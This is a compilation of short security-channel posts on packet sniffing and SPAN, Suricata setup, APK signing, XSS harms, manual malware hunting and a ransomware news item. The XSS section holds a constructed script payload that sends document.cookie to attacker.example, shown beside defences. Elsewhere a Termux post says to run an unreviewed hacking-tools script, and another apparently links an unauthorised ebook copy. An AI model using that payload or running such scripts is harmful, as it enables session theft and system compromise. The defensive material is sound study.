β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑How do you intercept traffic?
How to position and set up listening equipment?
Here we look at the options for placing (connecting) sniffing equipment in a switched environment (intercepting a Wi-Fi channel is left for the next article).
The most convenient option is to install the sniffer directly on the host we are interested in.
However, a host only sees what its switch port delivers, and its network interface only passes part of that on. In its normal receive mode a NIC accepts frames addressed to its own MAC address, to the broadcast address and to multicast groups it has joined; a unicast frame addressed to some other MAC is silently discarded by the adapter and never reaches the operating system, so no sniffer on that host can capture it. On top of that, a switch forwards a known unicast frame only to the port where the destination MAC was learned, so most traffic between two other hosts never appears on our port at all. Broadcast frames are the exception: the switch floods them to every port and every NIC accepts them.
The ARP exchange that hosts use to find the MAC address belonging to an IP address shows both behaviours.
1) Knowing the IP address, the host sends an ARP request (a broadcast) asking every device in the broadcast domain for the matching MAC.
2) Every host receives the request, but only the host that owns the requested IP answers; the others look at it in their ARP code and simply ignore it. The reply is a unicast frame back to the requester, and that frame is what the other hosts do not get: the switch sends it only to the requester's port, and even a NIC on a shared hub would drop it as "not addressed to me".
For clarity, in Cisco Packet Tracer, consider a host with IP address 192.168.1.2 sending an ARP request to host 192.168.1.4, with 192.168.1.3 on the same switch.
3) First check that 192.168.1.2 has no ARP entries at all with the command arp -a (existing entries can be deleted with arp -d), then ping 192.168.1.4.
4) Since the MAC address is unknown, an ARP request is sent first. It arrives at the switch (a Cisco 2960), which floods it out of all other ports. Host 192.168.1.3 receives it and ignores it; 192.168.1.4 replies, and the switch, having already learned the MAC of 192.168.1.2 from the request, delivers the reply only to that port.
5) To capture every frame that reaches the port of 192.168.1.3, including unicast frames addressed to other MACs, enable promiscuous mode on its network interface. Wireshark and tcpdump do this by default when they open an interface (tcpdump -p turns it off). Aircrack-ng belongs to the Wi-Fi case: airmon-ng puts a wireless card into monitor mode, the wireless counterpart, which is covered in the next article. Promiscuous mode only helps with frames that actually reach the port; it cannot make the switch send unicast traffic between other hosts to you.
6) When a traffic analyzer cannot be placed on the target host, a hub can help.
In that case the host under investigation and the traffic analyzer are connected to the same hub within the switched segment.
A hub repeats every incoming frame out of all its other ports, so all traffic to and from the investigated host also arrives at the analyzer's port.
7) For example, when Host1 sends packets to Host2, Hub0 repeats them both to the investigated Host2 and to the Sniffer.
In the picture the Sniffer drops the packets because promiscuous mode on its network adapter is disabled; with promiscuous mode enabled it captures them.
8) Port mirroring (SPAN on Cisco switches) remains the most popular way to intercept traffic.
It requires a managed switch and access to it, either physically via the console port or remotely over SSH or the web interface.
The idea is that the incoming and outgoing traffic of the device connected to one switch port is copied to another switch port, where the traffic analyzer is connected.
9) So, having connected, we configure the Cisco 2960 switch to mirror the traffic of ports fastEthernet 0/1 and fastEthernet 0/2, where host1 and host2 are connected respectively:
Switch> enable
Switch# configure terminal
Switch(config)# monitor session 1 source interface fastEthernet 0/1
Switch(config)# monitor session 1 source interface fastEthernet 0/2
And the port to which the traffic is mirrored, where the packet analyzer is connected:
Switch(config)# monitor session 1 destination interface fastEthernet 0/24
Switch(config)# end
Let's check:
Switch# show monitor session 1
Without a direction keyword a source port is mirrored in both directions (rx or tx can be appended to restrict it). Two things to keep in mind: a SPAN destination port stops behaving like a normal switch port, so the analyzer host gets no ordinary traffic on that interface and needs a second NIC for management; and mirroring several busy ports into one 100 Mbit/s destination can exceed its capacity, in which case the switch drops mirrored frames and the capture is incomplete.
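The ARP walk-through above (points 1 to 7), as an added example that is not part of the original post: a short Python model of the three filters involved, namely a learning switch, a hub, and the NIC's receive filter in normal versus promiscuous mode. The MAC addresses, the port names Fa0/1 to Fa0/3 and the frames themselves are constructed here for the example; nothing is read from a real interface.

```python
"""Added example (not from the original post): why a sniffer on 192.168.1.3
sees the broadcast ARP request but not the unicast ARP reply, and what a hub
or promiscuous mode changes. MACs and port names below are constructed."""
import struct

BROADCAST = b"\xff" * 6
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac(text):
    return bytes.fromhex(text.replace(":", ""))


def ip4(text):
    return bytes(int(octet) for octet in text.split("."))


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP packet. Requests go to the broadcast
    MAC; replies are unicast back to the requester."""
    dst = BROADCAST if op == ARP_REQUEST else target_mac
    eth = dst + sender_mac + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)      # Ethernet, IPv4, op
    arp += sender_mac + ip4(sender_ip) + target_mac + ip4(target_ip)
    return eth + arp


def parse_frame(frame):
    """Minimal parser: Ethernet header plus the ARP fields we care about."""
    info = {"dst": frame[:6], "src": frame[6:12],
            "ethertype": struct.unpack("!H", frame[12:14])[0]}
    if info["ethertype"] == ETHERTYPE_ARP:
        info["arp_op"] = struct.unpack("!H", frame[20:22])[0]
        info["sender_ip"] = ".".join(map(str, frame[28:32]))
        info["target_ip"] = ".".join(map(str, frame[38:42]))
    return info


def nic_accepts(frame, my_mac, promiscuous=False, multicast_groups=()):
    """Hardware receive filter: own unicast MAC, broadcast and joined multicast
    groups pass; anything else is dropped unless promiscuous mode is on."""
    if promiscuous:
        return True
    dst = frame[:6]
    return dst == my_mac or dst == BROADCAST or dst in multicast_groups


def switch_deliver(traffic, ports):
    """Learning switch: floods broadcast and unknown unicast, forwards known
    unicast only to the port where the destination MAC was learned."""
    table, out = {}, {p: [] for p in ports}
    for ingress, frame in traffic:
        dst, src = frame[:6], frame[6:12]
        table[src] = ingress
        if dst != BROADCAST and dst in table:
            out[table[dst]].append(frame)
        else:
            for p in ports:
                if p != ingress:
                    out[p].append(frame)
    return out


def hub_deliver(traffic, ports):
    """A hub repeats every frame out of every other port."""
    out = {p: [] for p in ports}
    for ingress, frame in traffic:
        for p in ports:
            if p != ingress:
                out[p].append(frame)
    return out


# Constructed topology: .2 on Fa0/1, the sniffer host .3 on Fa0/2, .4 on Fa0/3.
HOST2, HOST3, HOST4 = mac("00:11:22:33:44:02"), mac("00:11:22:33:44:03"), mac("00:11:22:33:44:04")
PORTS = ("Fa0/1", "Fa0/2", "Fa0/3")


def arp_ops_seen_by_sniffer(deliver, promiscuous):
    """ARP opcodes a sniffer on 192.168.1.3 captures for the ping's ARP exchange."""
    request = build_arp(ARP_REQUEST, HOST2, "192.168.1.2", b"\x00" * 6, "192.168.1.4")
    reply = build_arp(ARP_REPLY, HOST4, "192.168.1.4", HOST2, "192.168.1.2")
    on_wire = deliver([("Fa0/1", request), ("Fa0/3", reply)], PORTS)["Fa0/2"]
    return [parse_frame(f)["arp_op"] for f in on_wire
            if nic_accepts(f, HOST3, promiscuous)]


if __name__ == "__main__":
    for device in (switch_deliver, hub_deliver):
        for promisc in (False, True):
            print(f"{device.__name__:15} promiscuous={promisc!s:5} -> "
                  f"{arp_ops_seen_by_sniffer(device, promisc)}")
    # switch: [1] either way; hub: [1] normally, [1, 2] in promiscuous mode
```

Behind a switch the sniffer host captures only the broadcast request (opcode 1) whether or not promiscuous mode is on, because the unicast reply never reaches its port; on a hub the reply does reach the port, and promiscuous mode is what lets the NIC hand it to the capture tool. A SPAN session behaves like the hub case for the mirrored ports.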
don't clone our tutorials :)
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑Some termux hacking tools:
1) git clone https://github.com/AnonHackerr/toolss.git
2) cd toolss
3) chmod +x Tools.py
4) python Tools.py
Tools.py is an unreviewed third-party script that runs with your Termux user's permissions and installs further tools from other repositories; read it before running it.
β β β Uππ»βΊπ«Δπ¬πβ β β β
original Hacking The Art of Exploitation Ebook
http://www.mediafire.com/file/ht5dy5dwmf4h0j7/hacking-the-art-of-exploitation.pdf
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑Install Suricata IDS on Linux
You can also build Suricata from source. A few dependencies have to be installed first, as shown below.
Install dependencies on Debian, Ubuntu or Linux Mint
1) $ sudo apt-get install wget build-essential libpcre3-dev libpcre3-dbg automake autoconf libtool libpcap-dev libnet1-dev libyaml-dev zlib1g-dev libcap-ng-dev libjansson-dev
Install dependencies on CentOS, Fedora or RHEL
2) $ sudo yum install wget libpcap-devel libnet-devel pcre-devel gcc-c++ automake autoconf libtool make libyaml-devel zlib-devel file-devel jansson-devel nss-devel
These lists match the Suricata releases of the time; recent releases also need a Rust toolchain (rustc and cargo) and pcre2 instead of pcre3, so check the dependency list in the documentation of the release you download.
3) Once the packages are installed, download the latest Suricata source code from http://suricata-ids.org/download/, unpack it and configure the build. The --sysconfdir and --localstatedir options put the configuration under /etc/suricata and the logs under /var/log/suricata, which is where the install targets below and most of the documentation expect them:
$ tar xzf suricata-*.tar.gz
$ cd suricata-*/
$ ./configure --prefix=/usr --sysconfdir=/etc --localstatedir=/var
4) Now compile and install it.
$ make
$ sudo make install
The source tree ships default configuration files. Install them as follows:
$ sudo make install-conf
5) Suricata is useless without a rule set. Conveniently, the Makefile has an install target for rules (in these releases it downloads the Emerging Threats Open rules, which is why wget is in the dependency lists). To install them, run:
$ sudo make install-rules
install-full does install, install-conf and install-rules in one go. Before starting Suricata on a live interface, check the build and test the configuration, which also loads and parses every installed rule:
$ suricata --build-info
$ suricata -T -c /etc/suricata/suricata.yaml
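Once the rules are installed you will start adding your own; as an added example (not part of the original post and not Suricata's own code), here is a small checker for a rules file such as local.rules. It splits each rule into its header and its option list the way Suricata does, keeping a ';' inside a quoted msg or content intact, and reports the defects Suricata refuses at load time: a bad action, a missing sid, a duplicate sid, and a missing msg or rev. The rules in SAMPLE_RULES are constructed for the example.

```python
"""Added example (not part of the original post or of Suricata itself): a
small checker for a rules file such as local.rules. It splits each rule into
header and option list, keeps ';' inside quoted values intact, and reports the
problems Suricata rejects at load time. The rules below are constructed."""
import re

ACTIONS = {"alert", "drop", "pass", "reject", "rejectsrc", "rejectdst", "rejectboth"}
RULE_RE = re.compile(r"^(?P<header>[^(]+?)\s*\((?P<options>.*)\)\s*$")
HEADER_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)$")

SAMPLE_RULES = """\
# local.rules, constructed for this example
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 (msg:"SSH banner; client probe"; flow:to_server; content:"SSH-"; sid:1000001; rev:1;)
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"curl user-agent outbound"; content:"User-Agent|3a 20|curl"; http_header; sid:1000002; rev:2;)
alert tcp any any -> any 4444 (msg:"Metasploit default handler port"; flags:S; sid:1000001; rev:1;)
drop udp any any -> any 53 (content:"|00 01 00 00|"; offset:2; rev:1;)
alarm tcp any any -> any 80 (msg:"typo in action"; sid:1000004; rev:1;)
"""


def split_options(body):
    """'msg:"a;b"; sid:1;' -> [('msg', '"a;b"'), ('sid', '1')], honouring quotes
    and backslash escapes inside quoted values."""
    options, current, in_quote, i = [], [], False, 0
    while i < len(body):
        ch = body[i]
        if in_quote and ch == "\\" and i + 1 < len(body):
            current.append(body[i:i + 2])
            i += 2
            continue
        if ch == '"':
            in_quote = not in_quote
        if ch == ";" and not in_quote:
            token = "".join(current).strip()
            if token:
                name, _, value = token.partition(":")
                options.append((name.strip(), value.strip()))
            current = []
        else:
            current.append(ch)
        i += 1
    if in_quote or "".join(current).strip():
        raise ValueError("unterminated quote or option without ';'")
    return options


def parse_rule(line):
    """None for blank/comment lines, else a dict with the header fields and the
    option list. Raises ValueError on syntax Suricata would not load."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    m = RULE_RE.match(line)
    if not m:
        raise ValueError("missing '(' ... ')' option block")
    h = HEADER_RE.match(m.group("header"))
    if not h:
        raise ValueError("header must be: action proto src sport dir dst dport")
    action, proto, src, sport, direction, dst, dport = h.groups()
    return {"action": action, "proto": proto, "src": src, "sport": sport,
            "direction": direction, "dst": dst, "dport": dport,
            "options": split_options(m.group("options"))}


def check_rules(text):
    """List of (line_number, problem) for a rules file."""
    findings, seen_sids = [], {}
    for number, line in enumerate(text.splitlines(), 1):
        try:
            rule = parse_rule(line)
        except ValueError as err:
            findings.append((number, f"unparseable: {err}"))
            continue
        if rule is None:
            continue
        keys = [name for name, _ in rule["options"]]
        if rule["action"] not in ACTIONS:
            findings.append((number, f"unknown action '{rule['action']}'"))
        sid = dict(rule["options"]).get("sid")
        if sid is None:
            findings.append((number, "missing sid"))
        elif sid in seen_sids:
            findings.append((number, f"duplicate sid {sid} (first seen on line {seen_sids[sid]})"))
        else:
            seen_sids[sid] = number
        for required in ("msg", "rev"):
            if required not in keys:
                findings.append((number, f"missing {required}"))
    return findings


if __name__ == "__main__":
    for number, problem in check_rules(SAMPLE_RULES):
        print(f"line {number}: {problem}")
```

Run it over local.rules before `suricata -T`; the checker is stricter than necessary on msg (Suricata only warns) but a rule without a message is useless in the alert log anyway.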
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑SOME GOOD ANDROID APPS FOR RECOVERING LOST DATA
https://play.google.com/store/apps/details?id=com.wondershare.drfone
https://play.google.com/store/apps/dev?id=6817647156581849686
https://play.google.com/store/apps/details?id=com.easeus.mobisaver
https://play.google.com/store/apps/developer?id=EaseUS+Data+Recovery+Software
https://play.google.com/store/apps/details?id=video.recovery
https://play.google.com/store/apps/developer?id=Tasty+Blueberry+PI
https://play.google.com/store/apps/details?id=com.defianttech.diskdigger
https://play.google.com/store/apps/developer?id=Defiant+Technologies,+LLC
https://play.google.com/store/apps/details?id=com.greatstuffapps.digdeep
https://play.google.com/store/apps/developer?id=GreatStuffApps
https://play.google.com/store/apps/details?id=photo.recovery
https://play.google.com/store/apps/developer?id=Tasty+Blueberry+PI
https://play.google.com/store/apps/details?id=com.auntec.photo
https://play.google.com/store/apps/developer?id=Suzhou+Aunbox+Software+Co.+Ltd.
https://play.google.com/store/apps/details?id=com.baloota.dumpster
https://play.google.com/store/apps/dev?id=5104976176358171231
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑Mod your own apk
#fastTips
source code: https://github.com/kaleemullah360/android-APK-Mods
1) Install the framework. apktool if installs a framework APK (for example the device's /system/framework/framework-res.apk) into apktool's framework directory; it is only needed when the app you decode is a system app that references framework resources. For an ordinary app, skip this step.
java -jar apktool.jar if framework-res.apk
2) Decode the APK into a directory of the same name (smali code, resources and a readable AndroidManifest.xml)
java -jar apktool.jar d application-name.apk
Edit the smali or resource files under application-name/ as needed.
3) Rebuild from the decoded directory (not from the original .apk); the result is written to application-name/dist/application-name.apk
java -jar apktool.jar b application-name
4) Sign the rebuilt APK. apktool's output is unsigned, and Android refuses to install an unsigned APK; it also refuses an update whose signer differs from the already installed version, so uninstall the original first (or sign with the same key).
java -jar apk-signer-1.8.5.jar certificate.pem key.pk8 application-name.apk
The current standard tool for this step is apksigner from the Android SDK build-tools (apksigner sign --ks my.keystore application-name.apk, then apksigner verify --verbose application-name.apk), which produces the v2 signature scheme that newer Android versions check.
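Why step 4 is not optional, as an added example that is not from the original post or the linked repository: a Python check of whether an APK carries a v1 (JAR) signature under META-INF and/or a v2-or-later APK Signing Block just before the zip central directory, which is what the installer verifies. A throwaway APK-shaped zip is built in memory (placeholder contents, not real binary XML or dex), so the script runs offline; point signature_status() at a real file to test apktool's output before and after signing.

```python
"""Added example (not from the original post or the linked repository): tell
whether an APK is signed. apktool's rebuilt APK has no signature at all,
which is what step 4 fixes; a signed one carries a v1 JAR signature in
META-INF and/or an APK Signing Block (v2+) just before the zip central
directory. A throwaway APK-shaped zip is built in memory so this runs offline."""
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"
V2_MAGIC = b"APK Sig Block 42"


def find_eocd(data):
    """Offset of the End Of Central Directory record; the zip comment after it
    can be up to 64 KiB, so search backwards from the end."""
    idx = data.rfind(EOCD_SIG, max(0, len(data) - 22 - 0xFFFF))
    if idx < 0:
        raise ValueError("not a zip file: no EOCD record")
    return idx


def central_directory_offset(data):
    return struct.unpack_from("<I", data, find_eocd(data) + 16)[0]


def has_v2_signing_block(data):
    """v2/v3 signatures live in an APK Signing Block that ends with a 16-byte
    magic immediately before the central directory."""
    cd = central_directory_offset(data)
    return cd >= 32 and data[cd - 16:cd] == V2_MAGIC


def has_v1_signature(data):
    """v1 (JAR) signing: MANIFEST.MF plus a .SF and a .RSA/.DSA/.EC under META-INF."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = [n.upper() for n in z.namelist() if n.upper().startswith("META-INF/")]
    return ("META-INF/MANIFEST.MF" in names
            and any(n.endswith(".SF") for n in names)
            and any(n.endswith((".RSA", ".DSA", ".EC")) for n in names))


def signature_status(data):
    return {"v1": has_v1_signature(data), "v2_or_later": has_v2_signing_block(data)}


def make_apk_like(signed_v1=False):
    """Constructed stand-in for apktool output; contents are placeholders, not
    real binary XML, dex or PKCS#7 data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00placeholder")
        z.writestr("classes.dex", b"dex\n035\x00placeholder")
        if signed_v1:
            z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            z.writestr("META-INF/CERT.SF", "Signature-Version: 1.0\n")
            z.writestr("META-INF/CERT.RSA", b"\x30\x82placeholder-not-a-real-pkcs7")
    return buf.getvalue()


def insert_empty_signing_block(data):
    """Splice a structurally valid but empty APK Signing Block (no ID-value
    pairs, so it verifies nothing) before the central directory and fix up the
    EOCD offset; this shows where apksigner puts the real block."""
    cd, eocd = central_directory_offset(data), find_eocd(data)
    block = struct.pack("<Q", 24) + struct.pack("<Q", 24) + V2_MAGIC   # size, size, magic
    patched = bytearray(data[:cd] + block + data[cd:])
    struct.pack_into("<I", patched, eocd + len(block) + 16, cd + len(block))
    return bytes(patched)


if __name__ == "__main__":
    print("apktool-style output :", signature_status(make_apk_like()))
    print("v1-signed            :", signature_status(make_apk_like(signed_v1=True)))
    print("with v2 block        :", signature_status(insert_empty_signing_block(make_apk_like())))
```

The presence check is deliberately not a verification: it tells you a signature is there, not that it is valid for the contents, which is apksigner verify's job.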
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑Speed up Mega downloads and more:
Get file details and information
Download the file
Read the file and decrypt it
INSTALLATION & RUN:
first download https://github.com/BaseMax/MegaDownloader
step 1: make an API call to the Mega API server to get information about the file behind a download link; the API returns the file name, the file size and a download URL, where the file name is an encrypted string
step 2: download the encrypted file using the URL returned by the API in step 1
step 3: after the download, decrypt the file
The decryption key never goes to the server: everything after the # in a Mega link is the file key, which the browser (and this script) keeps client-side and uses to decrypt the file name and contents, while the API only ever sees the file ID. Anyone holding the full link therefore holds the key, so treat shared Mega links as secrets.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑What can XSS do?
Before learning how to exploit XSS, it is worth knowing what XSS can do, or rather what harm it can cause:
· Deface the page, modify its content
· Phishing (inject a fake login form into a page the user trusts)
· Steal user cookies (those not marked HttpOnly)
· Hijack the user's (browser) session, by replaying stolen cookies or by acting in the user's name from inside the page
· Inject ads, inflate traffic (click fraud)
· DDoS (every visitor's browser is made to hammer a third-party target)
· Drive-by malware (plant a hidden iframe or redirect that serves an exploit kit)
· Collect client information (such as user agent, IP address, and open ports on the client's local network via browser-side scanning)
· Spread an XSS worm (the payload re-posts itself through the victim's account, as the Samy worm did on MySpace)
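The cookie-theft and session-hijack items above, shown against a minimal page handler as an added example (not from the original post): render_vulnerable() echoes a query parameter straight into HTML, render_hardened() encodes it for the HTML context, safe_href() shows that attribute context needs a scheme check on top of escaping, and the session cookie is issued HttpOnly so document.cookie cannot read it. The payload, the attacker.example hostname and the cookie values are constructed for the example.

```python
"""Added example (not from the original post): the cookie-theft and session
hijack items above against a minimal page handler. render_vulnerable() echoes
a query parameter into HTML; render_hardened() encodes it for the HTML
context and the session cookie is issued HttpOnly so document.cookie cannot
read it. Payload, hostnames and cookie values are constructed."""
import html
from http.cookies import SimpleCookie
from urllib.parse import urlparse

# Classic exfiltration payload: the victim's browser fetches an image whose
# URL carries document.cookie to a host the attacker controls (constructed).
PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'


def render_vulnerable(search):
    """Reflected XSS: untrusted input concatenated straight into markup."""
    return f"<h1>Results for {search}</h1>"


def render_hardened(search):
    """Same page with HTML-context output encoding (&, <, >, \", ')."""
    return f"<h1>Results for {html.escape(search, quote=True)}</h1>"


def safe_href(url):
    """Attribute context needs more than escaping: html.escape() leaves a
    'javascript:' URL perfectly usable inside href, so allow-list the scheme."""
    if urlparse(url).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def session_cookie_header(session_id, hardened):
    """Set-Cookie line for the session. HttpOnly keeps it out of document.cookie,
    so even a successful XSS cannot exfiltrate it; the script can still act in
    the user's name while the page is open, which is why encoding still matters."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    if hardened:
        cookie["session"]["httponly"] = True
        cookie["session"]["secure"] = True
        cookie["session"]["samesite"] = "Lax"
    return cookie.output(header="Set-Cookie:").strip()


def script_would_run(page):
    """Crude browser model: an un-encoded <script ...> tag in the page executes."""
    return "<script" in page.lower()


def cookie_visible_to_script(set_cookie_line):
    return "httponly" not in set_cookie_line.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_hardened(PAYLOAD))
    print(safe_href("javascript:alert(document.cookie)"), safe_href("https://example.com/?a=1&b=2"))
    for hardened in (False, True):
        line = session_cookie_header("c0nstructed-session-id", hardened)
        print(line, "-> readable by XSS payload:", cookie_visible_to_script(line))
```

The two defences are complementary: output encoding stops the script from running at all, HttpOnly limits the damage when some other injection point is missed. Neither replaces the other.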
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑How to use the system's built-in commands for manual virus hunting?
1) Starting point: before doing anything else, prepare a baseline with tasklist
Modern malware hides behind process names, so it pays to save the computer's process list while the system is known to be clean, ideally right after logging in to Windows with no extra programs running. If the computer later behaves strangely, comparing the saved list with the current one shows which processes are new.
Enter at the command prompt:
tasklist /fo csv > g:\zc.csv
The command writes the current process list in CSV format to the file zc.csv; g: is the drive you want to save it to, and the file can be opened in Excel.
2) When you go looking, keep your eyes open: use fc to compare the process list files
If the computer feels abnormal, or you know a virus outbreak is going around, it is time to check.
Open a command prompt and enter:
tasklist /fo csv > g:\yc.csv
This produces yc.csv with the current process list. Then enter:
fc g:\zc.csv g:\yc.csv
After pressing Enter you see the differences between the two list files. Expect the PID and memory columns to differ on almost every line, so concentrate on the image names: in our example the comparison shows an extra, abnormal process called "Winion0n.exe" (used here as the example; note the digit 0 in the name), which is not the same thing as "Winionon.exe".
3) When you make the call, make sure the evidence holds up: use netstat to view open ports and connections
How do you decide whether such a suspicious process is malicious? Most malware, Trojans in particular, opens a connection to the outside through some port, so check which process owns which port.
Enter at the command prompt:
netstat -ano
The parameters mean:
-a: show all connections and listening ports
-n: show addresses and port numbers in numeric form (no DNS lookups)
-o: show the PID of the process that owns each connection
After pressing Enter you see every open port and every external connection together with its owning process. In our example the process with PID 1756 is the most suspicious: its state is "ESTABLISHED", and Task Manager (or the tasklist output, which also lists PIDs) maps that PID to "Winion0n.exe". If no network program you know of is supposed to run on this machine under that name, the connection is almost certainly illegitimate. Running netstat -anob from an elevated prompt adds the executable name to each line directly. Before acting on it, confirm the verdict by checking the file's path, its digital signature and its hash against a reputation service; an established connection from an unknown process is a strong indicator, not proof.
The connection states mean:
LISTENING: the port is open and waiting for a connection that has not yet arrived; only TCP service ports are shown in the LISTENING state.
ESTABLISHED: a connection has been set up.
The two machines are exchanging data.
TIME_WAIT: the connection has ended.
The port was used once and the exchange is over; it is useful for telling whether an outside computer was recently connected to this machine.
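Steps 1 to 3 above as a script run over the saved files, as an added example that is not part of the original post. The three inputs are constructed in the exact layout that tasklist /fo csv and netstat -ano print; the process names, PIDs and the remote address 203.0.113.5:4444 are invented for the example. It diffs by image name rather than by PID, flags a new name that imitates a baseline name (the "Winion0n" trick), and joins the netstat PIDs to the new processes so you do not have to look them up in Task Manager by hand.

```python
"""Added example (not from the original post): steps 1-3 above as a script
run over the saved files. The three inputs are constructed in the exact
format 'tasklist /fo csv' and 'netstat -ano' print; process names, PIDs and
the remote address 203.0.113.5:4444 are invented for the example."""
import csv
import difflib
import io

BASELINE_CSV = '''"Image Name","PID","Session Name","Session#","Mem Usage"
"System","4","Services","0","148 K"
"winlogon.exe","612","Console","1","5,212 K"
"svchost.exe","884","Services","0","7,640 K"
"explorer.exe","2216","Console","1","41,188 K"
'''

CURRENT_CSV = '''"Image Name","PID","Session Name","Session#","Mem Usage"
"System","4","Services","0","148 K"
"winlogon.exe","620","Console","1","5,204 K"
"svchost.exe","884","Services","0","7,644 K"
"explorer.exe","2240","Console","1","40,912 K"
"Winion0n.exe","1756","Console","1","2,300 K"
'''

NETSTAT_ANO = '''
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    192.168.1.10:49712     203.0.113.5:4444       ESTABLISHED     1756
  TCP    192.168.1.10:49730     192.168.1.1:80         TIME_WAIT       0
  UDP    0.0.0.0:5355           *:*                                    1108
'''

# Digits that malware likes to swap into a legitimate name ("Winion0n").
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "5": "s", "3": "e"})


def parse_tasklist(text):
    """Rows of 'tasklist /fo csv' as dicts keyed by the header names."""
    return list(csv.DictReader(io.StringIO(text.strip())))


def new_processes(baseline_csv, current_csv):
    """Image names present now but not in the baseline. Compared by name, not
    PID: PIDs (and memory figures) change on every boot, which is why a raw
    fc of the two CSV files reports nearly every line as different."""
    known = {row["Image Name"].lower() for row in parse_tasklist(baseline_csv)}
    return [row for row in parse_tasklist(current_csv)
            if row["Image Name"].lower() not in known]


def lookalikes(baseline_csv, current_csv, threshold=0.8):
    """Pair each new process with the baseline name it imitates, if any."""
    known = [row["Image Name"].lower() for row in parse_tasklist(baseline_csv)]
    pairs = []
    for row in new_processes(baseline_csv, current_csv):
        name = row["Image Name"].lower().translate(HOMOGLYPHS)
        best = max(known, key=lambda k: difflib.SequenceMatcher(None, name, k).ratio())
        if difflib.SequenceMatcher(None, name, best).ratio() >= threshold:
            pairs.append((row["Image Name"], best))
    return pairs


def parse_netstat(text):
    """Rows of 'netstat -ano'. UDP lines have no State column."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "TCP":
            proto, local, remote, state, pid = parts[:5]
        else:
            (proto, local, remote, pid), state = parts[:4], ""
        rows.append({"proto": proto, "local": local, "remote": remote,
                     "state": state, "pid": int(pid)})
    return rows


def suspicious_connections(baseline_csv, current_csv, netstat_text):
    """(pid, image, remote) for every ESTABLISHED connection owned by a process
    that was not in the baseline: the join the text does by hand via Task Manager."""
    new_by_pid = {int(r["PID"]): r["Image Name"] for r in new_processes(baseline_csv, current_csv)}
    return [(c["pid"], new_by_pid[c["pid"]], c["remote"])
            for c in parse_netstat(netstat_text)
            if c["state"] == "ESTABLISHED" and c["pid"] in new_by_pid]


if __name__ == "__main__":
    for image, legit in lookalikes(BASELINE_CSV, CURRENT_CSV):
        print(f"new process {image} looks like {legit}")
    for pid, image, remote in suspicious_connections(BASELINE_CSV, CURRENT_CSV, NETSTAT_ANO):
        print(f"PID {pid} ({image}) has an ESTABLISHED connection to {remote}")
```

To use it on real data, read zc.csv, yc.csv and the output of netstat -ano into the three strings instead of the constructed ones; the name-based diff also means a malicious process that reuses a legitimate name exactly (a second svchost.exe in the wrong directory) is not caught here and needs the path and signature check mentioned above.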
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑JavaScript email attachments may carry malicious code?
Most malicious software for Windows is written in a compiled language such as C or C++ and spreads as executable files such as .exe or .dll. Other malware is written in command-line scripting languages such as Windows batch or PowerShell.
Client-side malware is rarely written in web-related languages such as JavaScript, which is mainly interpreted by the browser. But the Windows Script Host built into Windows can run .js files directly: double-clicking a .js file outside the browser hands it to wscript.exe, which executes it with the user's full privileges and with access to the file system and the network through ActiveX objects.
Attackers have only recently started using this technique. Last month Microsoft warned that .js attachments in malicious emails may carry viruses, and ESET's security researchers also warned that some .js attachments run the Locky ransomware. In both cases, however, the JavaScript file is used as a downloader: it fetches traditional malware written in another language from a remote address and installs it. RAA is different. It is malware written entirely in JavaScript.
Experts on the BleepingComputer.com technical support forum said that RAA relies on CryptoJS, a JavaScript cryptography library, for its encryption. The implementation is solid, using the AES-256 algorithm.
Once a file is encrypted, RAA appends .locked to the original file name. Its targets include: .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar and .csv.
Lawrence Abrams, the founder of BleepingComputer.com, wrote in a blog post: "In the current situation, there is no way to decrypt it except for payment."
According to user reports, an infected machine displays messages in Russian, but even if its target is Russian computers, wider spread is only a matter of time.
It is very unusual for an email to carry a JavaScript attachment, so users should avoid opening such files even when they arrive inside a .zip archive; .js files are rarely used anywhere except in websites and browsers. Administrators can remove the risk at the source by changing the default handler for .js and .jse files to Notepad, or by disabling Windows Script Host for all users with the registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled set to 0 (DWORD); mail gateways should block .js attachments, including inside archives.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β